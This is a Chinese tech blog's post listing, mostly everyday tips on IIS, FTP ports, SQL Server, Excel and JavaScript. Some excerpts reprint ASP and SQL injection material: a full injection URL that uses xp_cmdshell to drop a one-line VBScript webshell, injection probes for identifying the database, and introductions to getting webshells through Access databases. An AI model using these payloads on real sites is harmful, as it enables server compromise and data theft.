- 博客(34)
- 资源 (3)
- 收藏
- 关注
RSS订阅转载 SQL模糊查询语句和Escape转义字符
通配符描述示例%包含零个或更多字符的任意字符串。WHERE title LIKE '%computer%' 将查找处于书名任意位置的包含单词 computer 的所有书名。_(下划线)任何单个字符。WHERE au_fname LIKE '_ean' 将查找以 ean 结尾的所有 4 个字母的名字(Dean、Sean 等)。[ ]指定范围 ([a-f]) 或集合 ([abcdef]) 中的
2015-09-17 13:44:13
729
转载 如何在Dreamweaver编辑和搜索非标准扩展名的文件?
工程师在开发的过程中,有时会用到ini文件来保存语言等字符串信息,会把扩展名改为do/action等其它格式,这就遇到非标准的文件扩展名是用DreamWeaver打不开也不方便操作的。如何能让DreamWeaver打开扩展名为do/action的文件,并以asp/php的颜色方案来显示,同时在其中进行搜索替换等操作呢?设置步骤如下:1. 修改 Extensions.txt 文件,有两处,分
2012-09-12 17:30:08
6423
1
原创 对服务器的ftp端口进行修改
<br /> 对服务器的ftp端口进行了修改,把21端口改了,比如221端口,就这样用221连接的时候,连接登录成功,但打不开目录,为何,总结如下:<br /> 1、完成一个FTP的传输过程不仅仅只需要21一个端口,而是2个端口,21端口只是一个命令端口,其实另外还有一个数据端口,我想这就是有些朋友在内网架设FTP并且在网关上做了21端口的映射之后外网还是不能访问的原因吧,另外一个数据端口是多少呢?这又牵涉到另外一个问题。<br /> 2、FTP具有两种模式,分别是port模式(也叫主动模式)和pas
2011-04-09 15:33:00
33018
3
转载 IIS状态代码的含义(常见HTTP、FTP请求错误)
<br />当用户试图通过HTTP或文件传输协议(FTP)访问一台正在运行Internet信息服务(IIS)的服务器上的内容时,IIS返回一个表示该请求的状态的数字代码。该状态代码记录在IIS日志中,同时也可能在Web浏览器或FTP客户端显示。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因。<br />日志文件的位置<br />在默认状态下,IIS把它的日志文件放在%WINDIR/System32/Logfiles文件夹中。每个万维网(WWW)站点和FTP站点在该目录下都有一个单独的目录。
2011-04-09 15:32:00
1754
原创 IIS FTP PASV模式下更改端口范围
<br />IIS FTP里的PASV模式下默认端口范围 1024 - 65535,连接时会从中随机选择到响应。如果该值未指定,或被设置成空字符串,则将使用 Winsock 指定的默认值 1025-5000。如果指定了该属性,则 FTP 将验证的有效范围从 5001 到 65535。要限制这片超大端口的范围,可以用IIS管理实用程序Adsutil.vbs。<br /> <br />C:/Inetpub/AdminScripts/cscript adsutil.vbs set /MSFTPSVC/Passiv
2011-04-09 15:31:00
4071
转载 C:/Inetpub/AdminsScripts的常用语法
<br />配置目录的存取权限<br />C:/Inetpub/AdminsScripts>chaccess.vbs -a w3svc/1/ROOT -verbose<br />Usage: chaccess <--ADSPath|-a ADSPATH> 控制配置路径<br />[--computer|-c COMPUTER1[,COMPUTER2...]]指定机器名,IP也可。<br />[+read|-read] 主目录下的读取权限<br />[+write|-write]主目录下的写入权限<br />
2011-04-09 15:30:00
884
转载 ASP注入详细命令40条
<br />1、用^转义字符来写ASP(一句话木马)文件的方法:<br />· http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:/mu.asp';-- <br />· echo ^<%execute^(request^("l"^)^)%^> >c:/m
2010-07-25 05:36:00
1549
1
转载 SQL注入Access导出WebShell 返回
<br />目前有一种在ACCESS数据库下导出Webshell的方法,这个方法是由lake2兄弟提出来的,下面就是我引用他这篇文章的原文:<br />已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。<br />最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。<br />几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等
2010-07-25 05:04:00
1695
转载 《改mdb为asp所带来的灾难》之狗尾续貂
<br />作者:lake2<br />来源:http://blog.csdn.net/lake2/<br /> 目前似乎都流行把mdb格式的数据库改成asp/asa防止被下载,不过大多数时候是不行的。因为我们用浏览器访问数据库会得到乱码,ok,此时我们用网际快车就能轻松的下到数据库。不过下数据库只是一点点皮毛,入侵者还能利用这个asp数据库得到webshell,要是你不清晰的话建议你先看看《改mdb为asp所带来的灾难》。<br /> · 呵呵,怕了吧,那你还改不改mdb为asp呢?答案是要的,我们总不
2010-07-25 04:52:00
705
转载 改mdb为asp所带来的灾难
<br />本文作者:SuperHei·Lilo<br />文章性质:原创<br />发布日期:2004-09-16<br /> <br /> 可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。一.思路<br /> 大家都知道<% %>为asp文件的标志符,也就是说一
2010-07-25 04:46:00
542
转载 ASP/SQL 注入天书
引言<br />随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即SQL注入。 <br />SQL注入是从正常的 WWW 端口访问,而且表面看起来跟一般的 Web 页面访问没什么区别,所以目前市面的防火墙都
2010-07-25 02:40:00
401
转载 总结asp注入时用到的方法
1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 and [查询条件] and =
2010-05-11 19:55:00
540
转载 Excel表格的35招必学秘技
也许你已经在Excel中完成过上百张财务报表,也许你已利用Excel函数实现过上千次的复杂运算,也许你认为Excel也不过如此,甚至了无新意。但我们平日里无数次重复的得心应手的使用方法只不过是Excel全部技巧的百分之一。本专题从Excel中的一些鲜为人知的技巧入手,领略一下关于Excel的别样风情。 一、让不同类型数据用不同颜色显示 在工资表中,如果想让大于等于20
2010-05-10 00:26:00
661
转载 PS2接口键盘、鼠标改成USB接口
市面上有PS2toUSB的转接口卖,打开之后发现所谓的转接口就是PS2和USB针脚直接互联就可以用了!在实验之前要说一声,PS2接口键盘、鼠标改成USB接口会出现不能使用的情况(原因是缺少驱动),一般来说光电的PS2鼠标改造成功的机会比较大一些! USB键盘要在BIOS里边将USB keyboard support设置为Enable啊。首先了解一下USB各个接线的定义。如图: 红
2010-04-19 19:20:00
11863
2
转载 修改IIS7的上传文件大小限制
Internet 信息服务(IIS)管理器→(主机)主页→ASP→限制属性→最大请求实体主体限制 默认2000000,即200k,修改为更大。 如果单独修改某个站点的大小限制: Internet 信息服务(IIS)管理器→网站→具体站点→ASP→限制属性→最大请求实体主体限制
2010-04-14 16:21:00
2357
2
原创 如何解决系统补丁VS2008 SP1(KB971092)重复安装问题
一个关于Visual Studio 2008 SP1 (KB971092) 的系统补丁重复安装问题的解决方案前几天微软发布了针对 VS2008SP1 的安全补丁,足足有300多M。更新完了又会提示更新,没完没了,有时还提示更新不成功。 以下解决方案解决问题:1.)下载补丁包(http://www.microsoft.com/downloads/details.aspx?displa
2010-01-23 18:59:00
2520
原创 如何给Word参考文献加方括号
脚注是在页面下端添加的注释,如添加在一篇论文首页下端的作者情况简介;尾注是在文档尾部(或节的尾部)添加的注释,如添加在一篇论文末尾的参考文献目录。 若用手工添加脚注和尾注,则既麻烦又易出错。当用Word添加脚注和尾注时,操作步骤变得简单了,且不易出错。 Word添加的脚注和尾注由两个互相链接的部分组成。即:注释标记和对应的注释文本。Word可自动为标记编号或由用户创建自定义标记。删
2010-01-05 19:12:00
33860
4
原创 SQL SERVER数据库,建立存储过程导出XML文件
建立存储过程 CREATE PROCEDURE P_SearchXML@sql_str varchar(100)ASset @sql_str = @sql_str + for XML Auto,BINARY BASE64EXEC sp_makewebtask @outputfile = c:/OutXmlFile.xml,@query= @sql_str,@templat
2009-12-05 20:44:00
2944
转载 利用SQL语句得到客户端的IP地址
--1:得到客户端的IP地址/************* IP **************/declare @ip varchar(20),@hst varchar(20),@sql varchar(100)declare @str varchar(100)set @str=PING +Host_Name()create table #tmp(aa varchar(200))insert
2009-12-03 03:47:00
698
转载 你真的知道一个HTML及资源是如何load的吗(了解各个部分是何时下载和执行的)
本博客所有内容采用 Creative Commons Licenses 许可使用. 引用本内容时,请保留 朱涛, 出处 ,并且 非商业 .点击 订阅 来订阅本博客.(推荐使用 google reader, 如果你的浏览器不支持直接订阅,请直接在 google reader 中手动添加).点击 下载pdf阅读 (如果浏览器不支持直接打开,请点击右键另存)摘要本文主要介绍浏览器请求
2009-12-03 03:37:00
1045
1
转载 Javascript开发经验
一、简化代码采用更为简短的写法,不仅可以减少输入的字符数,还可以减少文件大小。大部分采用简单写法的代码,执行效率都有轻微提高。1.1 简化常用对象定义:使用 var obj = {}; 代替 var obj = new Object();使用 var arr = []; 代替 var arr = new Array();1.2 精简if语句三元操作符可以有效精简只
2009-11-29 22:21:00
536
转载 程序员思维定势
1)机器思维 优秀的程序员最擅长和电脑程序打交道,并通过代码去控制反馈。而管理需要和人打交道,需要收集人的反馈。电脑是按逻辑来执行的,而人却要复杂很多,特别是团队中有女性成员,挑战难度就更大。 由于长期和电脑接触,很多程序员缺乏和别人沟通的技巧,或者说情商相对较低。这在管理上是比较致命的缺点。 2)BUG思维 优秀的程序员追求完美,看自己或者别人代码时第一有限是看什么地方可能有BUG, 管
2009-11-28 21:36:00
593
转载 Windows常见进程
ccmexec.exe进程名称:Microsoft SMS Agent Host描述:ccmexec.exe是微软SMS操作系统服务.该SMS Agent Host服务在其它服务之上.这个程序对你系统的正常运行是非常重要的.出品者:Microsoft属于:MicrosoftWindowsOperatingSystemcidaemon.exe进程名称:Microsoft Indexing Ser
2009-11-26 15:42:00
5166
转载 计算机电源功率计算
计算机电源功率计算要分两种!一、非磁放大电源:+5V对应的电流×10,比如,5V下面是20A就是200W,30A就是300W。二、磁放大技术电源:+5V的电压×电流+…+12V的电压×电流+…+3.3V的电压×电流(一共六组电压的功率相加)如下图,计算方法是:3.3x20 + 5x20 + 12x10 + 5x0.5 + 12x0.5 + 5x2 = 66 + 100 +
2009-11-26 15:37:00
1251
转载 开关电源的组成原理
开关电源由以下几个部分组成:一、主电路 从交流电网输入、直流输出的全过程,包括:1、输入滤波器:其作用是将电网存在的杂波过滤,同时也阻碍本机产生的杂波反馈到公共电网。2、整流与滤波:将电网交流电源直接整流为较平滑的直流电,以供下一级变换。3、逆变:将整流后的直流电变为高频交流电,这是高频开关电源的核心部分,频率越高,体积、重量与输出功率之比越小。4、输出整流与滤波:根据负载需要,提供稳定可
2009-11-26 15:32:00
798
转载 如何配置 SQL Server 2005 允许远程连接
若要在 SQL Server 2005 实例上启用远程连接并打开 SQL Server Browser 服务,请使用 SQL Server 2005 外围应用配置器工具。在安装 SQL Server 2005 时会安装外围应用配置器工具。 为 SQL Server 2005 Express Edition 或 SQL Server 2005 Developer Edition 启用远程连接
2009-11-26 15:28:00
329
转载 isArray()函数(JavaScript中判断对象类型的种种方法)
我们知道,JavaScript中检测对象类型的运算符有:typeof、instanceof,还有对象的constructor属性:1) typeof 运算符typeof 是一元运算符,返回结果是一个说明运算数类型的字符串。如:"number","string","boolean","object","function","undefined"(可用于判断变量是否存在)。但 typeof 的能力
2009-11-26 15:19:00
756
原创 Javascript二维数组
var x=3, y=4;var data = new Array(x);for (var i=0; i{ data[i] = new Array(y);}for (var i=0; i{ for (var j=0; j { data[i][j] = i + j; }} // var myarr = new Arrqy(3,4)// 定义的是一个有两个元素的一维数组,3和4是
2009-11-26 15:17:00
677
原创 如何关闭Visual Studio 2005实时调试器!
进入注册表,将以下两项删除掉就OK了。 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/AeDebug/Debugger HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/.NETFramework/DbgManagedDebugger
2009-11-26 15:15:00
735
原创 Excel的一些问题
1, Excel打印纸张设置16K的问题: Excel并没有象Word那样在页面设置中提供16开纸型的选项,如果手工重调,又会非常麻烦。解决这个问题就是为Excel手工添加16开纸支持,但这个任务需要在“控制面板”的“打印机和传真”中完成。在打印机里面添加16开纸型:选择一个打印机后,从“文件”菜单中选择“服务器属性”打开格式对话框,选中“创建新格式”复选框,然后在下面的“格式描述”中
2009-11-26 15:09:00
1353
转载 ASP之对象总结
ADO对象:ConnectionCommandRecordsetRecordStream ASP支持的对象很多,可以自己编写COM组件,下面是我们经常使用的:Server.CreateObject("scripting.filesystemobject")Server.CreateObject("scripting.dictionary")hashtableserver.crea
2009-11-26 15:07:00
605
转载 ASP动转静程序用UTF-8编码生成网页的函数
按照“FSO生成的网页文件默认编码格式以及转换成UTF-8编码方法”,编写函数采用用Adodb.Stream对象,成功生成UTF-8网页文件。以下函数采用FSO对象,文件位置在FSO.ASP。FSO对象的文件编码属性只有三种,系统默认,Unicode,ASCII,并没有我们要的utf-8,所以一般中文系统上使用FSO对象生成的文件都是gb2312网页编码格式,无法生成UTF-8编码,因此,英文
2009-11-26 15:04:00
921
转载 去掉FlashGet3的广告的办法
FlashGet3出来了,样子更好看了,可是广告也比以前多了,而且2.4的办法失效了,必须找到对付3.0广告的新办法。在安装目录(比如C:/Program Files/FlashGet Network/FlashGet 3/dat/stat)下面,将advertisement这个目录删除,然后建立一个空文件,命名为advertisement,注意不带后缀。这样就可以消除上面的横栏广告和右下
2009-11-26 14:57:00
667
转载 只要10招就帮你保养好数码相机电池
当你购买了新电池或好几个月没有用过的电池后,几次满充满放后才能完全激活电子,否则日后电池寿命会较短。锂电池的充电时数一定要超过6小时,镍氢电池一定要超过14小时,这样电池就可完全充满了。 使用原厂的充电器和电池,将有助于电池寿命的延长。对于充电时间,则取决于所用充电器和电池,以及使用电压是否稳定等因素。 电池还有残余电量时,尽量不要重复充电,以确保电池寿命。即使在数码相机上显示电池已经用完
2009-11-26 14:55:00
459
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人